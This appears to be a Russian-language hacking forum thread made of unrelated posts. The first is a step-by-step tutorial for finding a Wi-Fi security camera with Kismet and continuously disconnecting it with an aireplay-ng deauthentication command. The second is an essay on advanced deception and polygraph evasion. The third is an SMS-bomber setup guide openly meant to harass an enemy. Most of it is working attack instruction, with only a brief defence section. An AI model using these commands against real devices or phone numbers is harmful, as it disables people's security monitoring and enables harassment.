Обсуждаемая сегодня тактика отключит любое из этих устройств, не имеющих резервной копии Ethernet. Прежде чем кто-либо спросит, да, это означает, что вы можете теоретически создать сценарий, который замораживает все контролируемые Wi-Fi секс-игрушки, где бы вы ни находились. Почему кто-то может создать такое Орудие, я не знаю, но в этом примере мы сосредоточимся на наиболее часто встречающейся камере безопасности Wi-Fi.


Что нужно для начала работы

Для начала вам понадобится Kali Linux или другой дистрибутив Linux, такой как Parrot Security или BlackArch, который может запускать Aireplay-ng. Вы можете запустить его с виртуальной машины, установки через USB или с жесткого диска.
Затем вам понадобится адаптер беспроводной сети, который позволяет вводить пакеты и контролировать режим, так как вам нужно будет сканировать область, чтобы найти устройство, которое вы хотите отключить. Вам также нужно будет отправлять пакеты, которые претендуют на то, чтобы быть от точки доступа, к которой подключено устройство.

Шаг 1: Обновление Kali
С учетом этих двух требований вы можете начать, убедившись, что ваша система полностью обновлена. В Kali команду сделать можно увидеть ниже.
apt update

После этого вы должны быть готовы к работе, но убедитесь, что у вас есть цель, к которой у вас есть права доступа (и запрет на обслуживание) с помощью инструмента Aireplay-ng. Хотя вы можете сканировать любую сеть с помощью Kismet, Aireplay-ng выполнит атаку типа «отказ в обслуживании», которая запрещена для запуска в сети, для которой у вас нет разрешения на аудит.

Шаг 2: Выберите свое Орудие
Первым шагом в определении беспроводных целей является проведение пассивной разведки в беспроводной среде. Для этого мы можем использовать программу под названием Kismet, которая может выполнять интеллектуальный анализ беспроводных сигналов пассивным и необнаружимым образом. Преимущество этого состоит в том, что, просто находясь рядом с вашей целью, вы можете наблюдать за беспроводным трафиком в этом районе, а затем анализировать информацию, чтобы найти интересные устройства.
Альтернативой Kismet является запуск Arp-scan, который можно настроить несколькими способами для дальнейшей фильтрации информации о сетях, которые вы обнаруживаете. Хотя это работает, иногда вывод требует больше работы для расшифровки. Однако мы будем использовать Kismet для остальной части этого руководства.

Шаг 3: Переведите беспроводной адаптер в режим монитора
Чтобы начать сканирование любым из этих инструментов, нам нужно перевести адаптер беспроводной сети в режим мониторинга. Мы можем сделать это, набрав следующее, предполагая, что wlan0 - это имя вашей беспроводной карты. Вы можете получить имя вашей беспроводной карты, запустив ifconfig или ip a для просмотра списка доступных сетевых интерфейсов.
sudo airmon-ng start wlan0

После запуска команды вы можете запустить ifconfig или ip a еще раз, чтобы убедиться, что карта находится в режиме мониторинга. Теперь он должен называться как-то как wlan0mon.

Шаг 4: Запустите Kismet в сети
После того, как режим монитора позаботится, мы можем запустить Kismet, набрав следующее.
kismet -c wlan0mon

В этой команде мы указываем, какой сетевой адаптер использовать с Kismet, с флагом -c (client). Мы должны увидеть что-то вроде вывода ниже. Вы можете нажать Tab, затем Return, чтобы закрыть окно консоли и показать главный экран.

Шаг 5: Откройте беспроводные камеры безопасности с помощью Kismet
Теперь мы можем прокрутить сеть и попытаться определить интересные устройства. Если вы не можете сделать это, вам может потребоваться включить дополнительные параметры в меню «Preferences», чтобы увидеть источник пакетов. Вы можете получить доступ к этому через меню "Kismet"
После запуска Kismet вы можете начать поиск производителей любых устройств, которые выглядят так, будто они являются камерами безопасности. Здесь мы нашли вероятное устройство, которое, по словам Кисмета, сделано «Hangzhou.». Вы можете видеть его MAC-адрес A4:14:37:44:1F:AC.

Мы можем рассмотреть это более подробно из-за способа назначения MAC-адресов. Поскольку первые шесть цифр и букв назначены конкретной организации, я смог быстро найти название компании, которая производит это устройство, вместе с «A41437».
ad4a6315f65b2b139635c.png

Взяв полное название компании, в данном случае, Hangzhou Hikvision Digital Technology, простой поиск в Google показывает их продуктовую линейку. К счастью, это компания, которая производит беспроводные камеры наблюдения.
e226fbe245c966b63d1de.png

Теперь у нас есть три критических элемента: имя и BSSID точки доступа Wi-Fi, в которой находится камера, канал, по которому вещает сеть, и адреса BSSID самой камеры. Вы можете нажать Ctrl-C, чтобы закрыть Kismet.
Стоит отметить, что если камера видеонаблюдения начинает записывать или отправлять данные только тогда, когда видит движение, хакер может сесть за милю и просто записать, когда камера отправляет трафик, чтобы узнать, когда кто-то движется перед камерой, даже если они не могли видеть то, что камера видела напрямую.
Со всей этой информацией обнаружение, такое как дверь, контролируемая потоковой камерой, подключенной к цифровому видеорегистратору, будет означать, что мы можем ожидать, что устройство перестанет работать при отключении. Мы можем взять всю найденную информацию и использовать Aireplay-ng для отключения соединения.

Шаг 6: Выполните атаку деавторизации
Чтобы начать нарушать соединение с целевым устройством, нам нужно заблокировать нашу беспроводную сеть на канале, на котором мы наблюдали трафик. Мы можем сделать это, введя следующие команды, предполагая, что мы хотим заблокировать сетевой адаптер для канала 6.
airmon-ng start wlan0mon 6

Теперь, когда наша карта находится на правильном канале, мы можем направить команду, которая отключит устройство, которое мы нашли. Команда, которую мы будем использовать для этого, отформатирована так:
aireplay-ng -0 0 -a <bssid of access point> -c <bssid of client device> <name of the adapter>

Чтобы разбить то, что делают команды выше:
  • -0 установит опцию атаки на опцию 0, атака деаутентификации, которая будет отправлять пакеты аутентификации, притворяясь, что они находятся от точки доступа к устройству. Следующий 0 указывает на отправку непрерывного потока пакетов деаутентификации, но вы также можете выбрать фиксированный номер для отправки здесь.
  • -a установит BSSID точки доступа Wi-Fi, к которой подключено устройство.
  • -c установит BSSID устройства, которое мы хотим отключить от сети.
Наша последняя команда для нашего примера будет выглядеть следующим образом.
aireplay-ng -0 0 -a f2:9f:c2:34:55:64 -c a4:14:37:44:1f:ac wlan0mon

После выполнения этой команды она будет продолжать блокировать соединение Wi-Fi между двумя устройствами, пока вы не отмените команду, нажав комбинацию клавиш Ctrl-C.

Защита от этого типа атаки
Чтобы предотвратить нацеливание сетевых устройств, лучшим решением является использование Ethernet. Хотя он гораздо менее удобен, чем Wi-Fi, он не позволяет манипулировать соединением или внезапно обрывать его в критические моменты времени от постороннего лица без физического доступа. Поскольку это всегда возможно при использовании Wi-Fi, он просто не очень подходит для выполнения такой работы в обстановке, где он может быть атакован.
Хотя некоторые пользователи пытаются использовать такую тактику, как «hidden» вашей сети, чтобы избежать подобных атак, это просто привлечет гораздо больше внимания и любопытства, чем фактически защитит вашу сеть. Любая камера или устройство, активно использующее Wi-Fi, предаст свое подключение к такому инструменту, как Kismet, что означает, что лучшим решением будет просто не использовать Wi-Fi, когда это возможно.
Если вам абсолютно необходимо, снижение мощности вашей точки доступа Wi-Fi для предотвращения ненужного распространения сигнала может затруднить чтение этой информации, но большинство устройств IoT не поддерживают эту функцию.

У устройств интернет вещей есть серьезные недостатки
Имея возможность выборочно отключать любое Wi-Fi-зависимое устройство, хакеры могут использовать эту возможность, чтобы использовать в своих интересах ситуации, полагающиеся на эти устройства для обеспечения безопасности. Люди должны использовать и развертывать эти устройства, чтобы они обновлялись и выполняли роли, соответствующие их возможностям. В этом случае ясно, что на зависимую от Wi-Fi камеру безопасности нельзя положиться, чтобы обеспечить непрерывное потоковое покрытие важных областей.
 

Вложения

  • IMG_20200710_235042_680.jpg
    IMG_20200710_235042_680.jpg
    86.8 KB · Просмотры: 0
Обман на продвинутом уровне
IMG_20200712_215548_590.jpg

Обман "высшего сорта" — что отнести к такому уровню? Каковы его признаки, характеристики? Как распознать и что делать честному человеку? Давайте разберемся:

Что считать высшим пилотажем обмана?


Приведем определение продвинутой лжи здесь (как говорится, повторение — мать учения):

Высший пилотаж обмана — уровень, который можно назвать продвинутой ложью. Такое совершенство обмана доступно относительно немногим, но среди тех, кому он покоряется, харизматичные политики, проповедники, профессиональные продавцы, игроки в покер и мошенники. Эти люди, особенно мошенники, применяют особые психологические уловки, чтобы максимально быстро убедить жертву в своей искренности вплоть до того, что человек доверяет даже свою жизнь незнакомцам. Люди, владеющие этими навыками, обладают собственными отработанными техниками, позволяющими им контролировать своё невербальное поведение и общаться одновременно на подсознательном и речевом уровне.

Продвинутая ложь имеет набор характеристик и признаков, которые делают ее таковой. Давайте рассмотрим наиболее важные из них:
Признаки продвинутой лжи

Успешность обмана. Такой обман не раскрывается, либо раскрывается слишком поздно, уже после того, как лжец добился задуманного при помощи своей лжи.
Вера социального инженера в свой обман. Хороший лжец обязательно обладает актерским талантом, а хорошая актерская игра по системе Станиславского предполагает полное "погружение в образ". Чтобы люди поверили в обман, обманщик должен сам в него поверить: таким образом он говорит, действует так, будто обмана нет, будто его ложь — чистейшая правда. При таком подходе лжец сводит к минимуму шансы выдать себя оговорками, неуверенностью, не "путается в показаниях" и не выдает себя невербально (мимикой, движениями и прочими проявлениями "языка тела"). Яркий пример — техника обмана полиграфа (детектора лжи): в первую очередь нужно успокоиться, сжиться с мыслью о реальности своей лжи, не воспринимать её, как ложь и просто говорить "правду", в которую искренне веришь.
Органичность. Хороший обман органично вписывается в антураж, окружающую среду: политический строй, "дух времени", моральные нормы, особенности профессии, правила и традиции общества или круга лиц, которых обманывают. При коммунизме ложь вплетается в канву коммунистических идей, при капитализме на фоне капиталистических идеалов труд эксплуатируется на условиях худших, чем при феодальном строе, в кругу бизнесменов используется терминология, атрибутика и ценности людей, нацеленных на заработок денег, в среде защитников животных под эгидой защиты животных выбиваются персональные блага или "наезды" и шантаж предприятий. Ложь не только вписывается в идеалы, нормы и порядки, но иногда эксплуатирует их вплоть до шантажа жертв. Примеры сумбурны, но я надеюсь, что читатель поймает основную мысль.
Уместность. Является синтезом предыдущих двух признаков. Лжец "свой среди своих" и всеми средствами это демонстрирует.
Заразительность. Жертвы обмана не только верят обманщику, но и передают ложь, искренне веря в её правдивость.
Сложность схем. Продвинутая ложь для достижения целей обмана использует "многоходовочки". Хорошо продуманная схема обмана подобна шахматной партии: обманщик продумывает все на много ходов вперед, предусматривает различные варианты хода событий, реакций на ложь на разных этапах. Он готов к гамбитам (жертве фигур) ради достижения целей, готов к частичному или полному раскрытию обмана, когда за ним стоит куда больший обман.
Изобретательность. Обманщик адаптирует ложь таким образом, чтобы от сути лжи отвлекало что-либо значимое: инновационность его предложения или идеи, опасность в случае отсутствия действий (нужных лжецу), актуальность предмета "лжи здесь и сейчас".

Продвинутая ложь, высший пилотаж обязательно обладает некоторыми из перечисленных признаков или всеми без исключения.

Как же распознать такую ложь в реальной жизни, если лжец/лжецы артистичны, просчитали все до мелочей, готовы идти на жертвы и в текущий момент времени вы просто не видите, является ли происходящее частью обмана или это просто случайное стечение обстоятельств? Попробуем разобраться.
Как распознать продвинутый обман

Для на начала ответить на вопрос: кому это выгодно, если это обман? Чем больше заинтересованных сторон и чем больше потенциальной выгоды для них Вы найдете, тем больше вероятность обмана.

Не нашли возможных заинтересованных сторон? Постарайтесь взглянуть на ситуацию или предмет возможного обмана с новой стороны, не сквозь призму своего обычного мировосприятия. Да, это может быть тяжело, требует саморазвития, возможно изнурительного умственного труда. Но именно этим мы по сути и занимаемся на нашем канале — изучаем очень нелегкий, хоть и интересный предмет.
Допустим, Вы сумели распознать обман, что же делать дальше?

Очевидно, если обман задевает Ваши интересы, постараться предупредить возможные потери, которые он может принести. Это можно сделать изобличив лжеца, ответным обманом, достижением договоренностей с обманщиком, при которых ваши интересы не пострадают.

Хотелось бы предупредить читателя: если последствия встречного обмана могут повлечь более ощутимые потери, чем его отсутствие — не стоит идти на такой риск, особенно если в вашем случае это преследуется по закону.

Как отличный социальный инженер продумывает обман на несколько шагов вперед, плетет сети и строит схемы, так и честный думающий человек должен уметь не только распознать обман и предугадать ходы обманщика, но и оценивать последствия своего вмешательства или встречных действий.
 
IMG_20200714_091124_893.jpg

Как организовать мощный спам SMS-сообщениями

Добрый день, дорогие друзья. Сегодня мы с вами настроим мощный SMS-бомбер, который может по-настоящему вывести из себя вашего неприятеля. Для начала нам необходимо скачать Termux

Запускаем Termux и обновляем пакеты:
apt update & apt upgrade -y

Устанавливаем git:
pkg install git

Указываем ссылку на GitHub, где лежит пакет установки:
git clone

Переходим в директорию и запускаем бомбер:
cd android
cd Infinite-Bomber-arm64
chmod 777 infinite-bomber
./infinite-bomber

После ввода этих команд, наш SMS Bomber запустится. Тебе потребуется ввести номер телефона, который ты собираешься использовать для атаки и следовать инструкции.

⚠️ Если запустить несколько сессий в Termux, то у тебя получится отправить в разы больше SMS.
 
Сверху Снизу